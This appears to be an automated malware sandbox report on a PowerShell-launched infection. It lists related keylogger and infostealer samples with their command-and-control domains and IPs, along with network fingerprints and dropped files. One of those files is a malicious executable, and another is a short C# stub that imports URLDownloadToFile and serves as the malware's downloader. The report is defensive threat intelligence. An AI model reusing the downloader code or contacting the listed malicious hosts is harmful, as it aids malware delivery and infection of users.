                                                                                  • www.oldpay.online/u023/?lneDc=2js00DxFGjY6gHlVOW1q9a10L3HzPIs7WpRmaT2A/LnakQk0VzYAjcxSKMUcEwKHsPPKaiHoQA==&NvExnX=FrapFFYPB
                                                                                  z1companyProfileandproducts.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.dd87558.vip/uoki/
                                                                                  http://7a.ithuupvudv.ruGet hashmaliciousUnknownBrowse
                                                                                  • 7a.ithuupvudv.ru/favicon.ico
                                                                                  PRI_VTK250419A.exeGet hashmaliciousLokibotBrowse
                                                                                  • touxzw.ir/scc1/five/fre.php
                                                                                  dfiCWCanbj.exeGet hashmaliciousLokibotBrowse
                                                                                  • touxzw.ir/sccc/five/fre.php
                                                                                  laser (2).ps1Get hashmaliciousFormBookBrowse
                                                                                  • www.lucynoel6465.shop/jgkl/
                                                                                  laser.ps1Get hashmaliciousFormBookBrowse
                                                                                  • www.tumbetgirislinki.fit/k566/
                                                                                  QUOTATION REQUEST.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.shlomi.app/t3l4/
                                                                                  132.226.247.73QUOTATION_FEBQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  BL-INVOICE DOCUMENTS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  fw5476UX6g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  TpHHp3vAuM.exeGet hashmaliciousCryptOne, Snake KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  oR7Y7ZxJLU.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  hwk4b4iuNV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  qgzE2sjyM8.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  Xbj1WKmiEx.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  ly1dkCzsOZ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  1evYVracjk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • checkip.dyndns.org/

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  checkip.dyndns.comQUOTATION_FEBQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                  • 132.226.247.73
                                                                                  New Order RFQ- 19A20060.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 193.122.6.168
                                                                                  EM#U0130R_7880330875661236965345096345789_3479653.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 132.226.8.169
                                                                                  INQ_NO_097590_0109_Order.cmdGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                  • 193.122.6.168
                                                                                  SIP_20252701095738583757327401213.bat.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 193.122.6.168
                                                                                  ja811MqV4h.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                  • 193.122.130.0
                                                                                  SHIPPING ADVICE#2025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 193.122.130.0
                                                                                  BL-INVOICE DOCUMENTS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 132.226.247.73
                                                                                  rDatosbancarios.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 193.122.130.0
                                                                                  rDatosbancarios.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 158.101.44.242
                                                                                  reallyfreegeoip.orgQUOTATION_FEBQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                  • 104.21.32.1
                                                                                  New Order RFQ- 19A20060.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 104.21.112.1
                                                                                  EM#U0130R_7880330875661236965345096345789_3479653.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.32.1
                                                                                  INQ_NO_097590_0109_Order.cmdGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                  • 104.21.80.1
                                                                                  SIP_20252701095738583757327401213.bat.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.64.1
                                                                                  ja811MqV4h.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                  • 104.21.32.1
                                                                                  SHIPPING ADVICE#2025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 104.21.80.1
                                                                                  BL-INVOICE DOCUMENTS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 104.21.32.1
                                                                                  rDatosbancarios.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 104.21.16.1
                                                                                  rDatosbancarios.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 104.21.96.1

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CLOUDFLARENETUSQUOTATION_FEBQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                  • 104.21.32.1
                                                                                  P.Order request for quotations.exeGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.148.163
                                                                                  PAYMENT COPY.exeGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.148.163
                                                                                  Enquiry Quote - 21834-01.exeGet hashmaliciousFormBookBrowse
                                                                                  • 188.114.96.3
                                                                                  New Order RFQ- 19A20060.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 104.21.112.1
                                                                                  EM#U0130R_7880330875661236965345096345789_3479653.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.32.1
                                                                                  kcDXTU4FJm.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.21.102
                                                                                  https://tmo111fflcdfhhhgry4747jb7.berkonline.orgGet hashmaliciousInvisible JS, Tycoon2FABrowse
                                                                                  • 104.16.2.189
                                                                                  kcDXTU4FJm.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.21.102
                                                                                  INQ_NO_097590_0109_Order.cmdGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                  • 104.21.80.1
                                                                                  AS-COLOCROSSINGUSRef PO24777.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 192.3.95.138
                                                                                  Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 192.3.95.138
                                                                                  Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 192.3.95.138
                                                                                  yMz2PhsiYd.exeGet hashmaliciousAveMaria, DBatLoader, PrivateLoaderBrowse
                                                                                  • 198.46.177.153
                                                                                  Df5s9yVTL4.exeGet hashmaliciousRemcosBrowse
                                                                                  • 198.23.227.212
                                                                                  niceworkingskilldevelopedwithgreatnews.htaGet hashmaliciousCobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                  • 192.227.228.22
                                                                                  niceskillbestexperiencegivenmegood.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                  • 23.95.235.28
                                                                                  COTA#U00c7#U00c3O.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 172.245.191.88
                                                                                  Nouvelle_commande9353834.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 23.95.235.28
                                                                                  Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 198.12.89.24
                                                                                  UTMEMUSQUOTATION_FEBQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                  • 132.226.247.73
                                                                                  EM#U0130R_7880330875661236965345096345789_3479653.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 132.226.8.169
                                                                                  BL-INVOICE DOCUMENTS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 132.226.247.73
                                                                                  uyqMsPsOG1.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 132.226.8.169
                                                                                  fw5476UX6g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 132.226.247.73
                                                                                  TpHHp3vAuM.exeGet hashmaliciousCryptOne, Snake KeyloggerBrowse
                                                                                  • 132.226.247.73
                                                                                  7uUGimQipu.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 132.226.8.169
                                                                                  oR7Y7ZxJLU.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 132.226.247.73
                                                                                  xWApJIM4Ma.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 132.226.8.169
                                                                                  hwk4b4iuNV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 132.226.247.73

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  54328bd36c14bd82ddaa0c04b25ed9adniceworkingskillwithbestideasevermade.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.80.1
                                                                                  QUOTATION_FEBQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                  • 104.21.80.1
                                                                                  New Order RFQ- 19A20060.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 104.21.80.1
                                                                                  EM#U0130R_7880330875661236965345096345789_3479653.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.80.1
                                                                                  INQ_NO_097590_0109_Order.cmdGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                  • 104.21.80.1
                                                                                  SIP_20252701095738583757327401213.bat.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.80.1
                                                                                  ja811MqV4h.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                  • 104.21.80.1
                                                                                  SHIPPING ADVICE#2025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 104.21.80.1
                                                                                  BL-INVOICE DOCUMENTS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 104.21.80.1
                                                                                  rDatosbancarios.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 104.21.80.1

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcc[1].exe

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):965120
                                                                                  Entropy (8bit):6.845520383869049
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:tu6J33O0c+JY5UZ+XC0kGso6FaPvvkoWY:fu0c++OCvkGs9FaPvSY
                                                                                  MD5:0FD138D0A654100FD6E3CCDEBCE396A3
                                                                                  SHA1:2B3057A13330297D9821E897C3DA00EEA4E6AFBC
                                                                                  SHA-256:650D1380A5AD93E0FD6E27BA7E43DCA09E8403161076EBC4E2BBF0624BDB1155
                                                                                  SHA-512:0BF65F5F994E4EF4676BE0CFAF6B2BCF476DDB9C9491CDF17D8F951ACE0E3A302F1A1F164D51B09DE031E9915FFE34DDE602194A583CB2AD0260206458BB68DF
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                                                  Reputation:low
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L......g.........."..................}............@..........................0............@...@.......@.....................L...|....p..x0.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...x0...p...2..................@..@.reloc...q.......r...H..............@..B........................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):1328
                                                                                  Entropy (8bit):5.405945905705216
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:3K1yt4WSKco4KmM6GjKbmOIKoas4RPQoUP7mZ9t7J0gt/NK3R8UHr8Htq:sy+WSU4Yympx4RIoUP7mZ9tK8NWR8Wz
                                                                                  MD5:37FC686DAB57271B4D67E9ACADEDF858
                                                                                  SHA1:0B04273C8DA5E81E9A84573B73D1E106B97662B4
                                                                                  SHA-256:2DAD1B448BBDAE4408DA7B59216B5422433FD36CE2411B9423247DC3FDD72596
                                                                                  SHA-512:71C88B75D3892A7398B7FF22D0C4F61A702955D8C9A98491DADA6B59762172140E391DBAA668318659B0621D3AE1E9BC4572A93029795355F95BEA07105D6F6C
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                  C:\Users\user\AppData\Local\Temp\RES94CA.tmp

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Tue Mar 11 09:25:30 2025, 1st section name ".debug$S"
                                                                                  Category:dropped
                                                                                  Size (bytes):1340
                                                                                  Entropy (8bit):4.015047986854206
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:HsK9oVaA/w2vVAaHYwKcjmfwI+ycuZhNemuakSRmvPNnqSed:GIAI2dFHK2mo1ulePa3RQqS+
                                                                                  MD5:4D58ADB39DC6E973EE3A4F09CD65FE99
                                                                                  SHA1:86EA7F0D22334A03053F9485DE503DC459612DA8
                                                                                  SHA-256:54958AFF86C2BA50EFC022439BC05C1B3CB4F9C2FBFAF1500B6BC00C240E8A64
                                                                                  SHA-512:9E6FE834CF4663BE45A3F44845CD83975537F557116C4355C8DD0296B2ACFA0148975710EE9E050B7108C677C7B04D9BD11942A41A004733D263335B8A048B6A
                                                                                  Malicious:false
                                                                                  Preview:L......g.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........W....c:\Users\user\AppData\Local\Temp\qfzuxwqd\CSCADD237997B8E4BD496D9E414C49E4A6C.TMP................#$.!%...pZ..../..........7.......C:\Users\user\AppData\Local\Temp\RES94CA.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.f.z.u.x.w.q.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axhiry3e.oct.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfnzjg0h.gbd.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u5skvwim.3wa.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xxd25sm5.swo.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\autAF18.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\AppData\Roaming\vcc.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):61714
                                                                                  Entropy (8bit):7.878981108078969
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:+V3QMbWFHQgYerfjHhw6l6MK/7V9BQv7v9Go3z:+V3QdnYquv/7VUgS
                                                                                  MD5:D45ED20D5716818EB0E104A84B075E1D
                                                                                  SHA1:9954C35DC4BB434E9C3FF1D8AEA4558F69DF5C9E
                                                                                  SHA-256:BE031CC10B49538DE52D1FB1B8AE96BAA87C3853217F4F5E3982521CE5E25FBA
                                                                                  SHA-512:55BCD60A7D9851AC9128A1C4FFADE16C95A7413F3A306FB529C634184CE699F7BE2402A65CAA7178D47AC12DB13DFDB0A0831EBF3D7A23D16D011DB0B6C6FC2D
                                                                                  Malicious:false
                                                                                  Preview:EA06..n...u.i.&kC......e9.L*....q6....0.B.H.Nh@.....|]@.BmV..f~.f....q....{0.Q.Rj..7..$rj.Zm.....mb1 ....X.._'.W-.........~.O.Rf3..z?..d.N.G.Ri6)...V..)`....(..........;..qi..+.Z}..35 ..n...P..*.:..qI...t..FE9.H.21(...KeV.....L....x|.%>......}.....S....mp.(.2......iC....d.sB..(|6*D.l.I'.p.C.L..?@..8.@.U..>.."ey.P.R9.q6..Zd.....|...O....PQ..BuI.P..J-?-..Nh ..:.8..0.Z.,.......k.s0{.4......n.L.S.S...Q.....f'7P.B..(U@.....<..'.....P.... .B..(K@.....e..mB.H.D.....C.O'.?..%Z..xT...C.....qI.."...,.Q...3 .F,.(.@...6.W....L.Y...(T.d..0../.Y..!p...5.}..Sv...q@. ..9.~.2..Uz}zo1.N){ZL.A..)Q...a].........o.....6.P.WY...8.D.1..6..PX.Q;.:.O.Q.sh.>?!..9.:..cV..*...q6.Xn.9.r.e.R).z..M.....|~.3.E@}..L...ZqSj5..0.P.7.D.{i.Jo.J..>..hsYO..B.E.7..^.|......&gr...P....u.N).[]..E......mW...x..............t.qC..f.{e>.L.Og.>.i.M.S(..g^...T..~.........L.T.-.wG.P:...r.I..d.->.J.. ...Z.E......j....fS...2........3.N#@%..M..../....L.TKVK..HF0.7.....tZ}..+.......O,.g@i....L.G

                                                                                  C:\Users\user\AppData\Local\Temp\qfzuxwqd\CSCADD237997B8E4BD496D9E414C49E4A6C.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                  File Type:MSVC .res
                                                                                  Category:dropped
                                                                                  Size (bytes):652
                                                                                  Entropy (8bit):3.127397278269538
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryQmuak7YnqqRmvPN5Dlq5J:+RI+ycuZhNemuakSRmvPNnqX
                                                                                  MD5:232410212505E297D4705AFB958EF02F
                                                                                  SHA1:DAEAB966D1F9F8CFEB9A6A4DAF059DFD8A5F4082
                                                                                  SHA-256:76C4A631149FB58FC53C2445F2F24841EE602AEE12C9971279779150C3C92A92
                                                                                  SHA-512:1C078484D6F5267B1126883AFEEDB8194A77608933D6BA5DFD668886315FE39218EEE2C812F1737F0C3DE5D5796457293579CA0621C7F0CC27399FCEA7F92698
                                                                                  Malicious:false
                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.f.z.u.x.w.q.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...q.f.z.u.x.w.q.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                  C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.0.cs

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (363)
                                                                                  Category:dropped
                                                                                  Size (bytes):480
                                                                                  Entropy (8bit):3.819198563627844
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:V/DsYLDS81zuaQF05oFFVMmNvQXReKJ8SRHy4HgCcxUYKCQ1Okzy:V/DTLDfuZvFMXfHUDxU97zy
                                                                                  MD5:878EF8307E7854F9FC7D5EC99DD9FC04
                                                                                  SHA1:0BE45F31F89A847D0ED34227BC46C7DC434D41FF
                                                                                  SHA-256:43F4204A7211616A361F86B3AB2220B1855D15C61AB71F9327DBAFD3C58AF591
                                                                                  SHA-512:9135B81E87FE1F231047FF3BABF7F41ACA0C35DA55C4402E994B1789C0AAA4323E43682CA8345E7BCB51A8C2BC05A82A8EEB44CE1C2A72A3EF87812B6DB240EF
                                                                                  Malicious:false
                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace SwCz.{. public class BisVATFos. {. [DllImport("UrLmOn.DLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr ho,string JzfHBpUTq,string ZMpk,uint iVaVcINXo,IntPtr EVnaoe);.. }..}.

                                                                                  C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.cmdline

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):375
                                                                                  Entropy (8bit):5.282006432360675
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fBDqzxs7+AEszIN723fBDhLxn:p37Lvkmb6K2aZDqWZETaZDdx
                                                                                  MD5:F638FBE4D80050E63DFC491AE5F6A326
                                                                                  SHA1:8408BD14F036F5A03A4EE42136DD607D548FE2ED
                                                                                  SHA-256:7E404B7B8FB5E92FD74215E9901B23151BF3EA20791534EB903B155948A52DF2
                                                                                  SHA-512:6CB6F4C012847955C540A3CDD11EC83EA71BE4B86506CE1AAD8AE10A34621629FC11025213F7545983A5E9981D615742B140049BE3DD13113887EF853BFA9AD3
                                                                                  Malicious:true
                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.0.cs"

                                                                                  C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):2.8445322210339072
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:etGS6PBe5ekrl8sN8gkTxqBateUu+tkZfYZbCZ0WI+ycuZhNemuakSRmvPNnq:6hskr+PxrtLkJYZbCZX1ulePa3RQq
                                                                                  MD5:088700CEB66D3FF7166169F0C9C9A81C
                                                                                  SHA1:BA7FAB7E6217A94C0077D558FB4439F9B23B785B
                                                                                  SHA-256:BF0CBBA1B0DF46AF7BBDA15CDADC8D960F60A2D3F0BAD52CDEBBA130B8DAEB65
                                                                                  SHA-512:72B2E64A9190DC1BEBB4851CD92A128DDF3FBCD8C2D08B17B42B2F7B72A7DF6DF12AEC691B3F0DBFA444030B0EEEA1AB0F3E89761F74A07821F23F21A3CF5BBC
                                                                                  Malicious:true
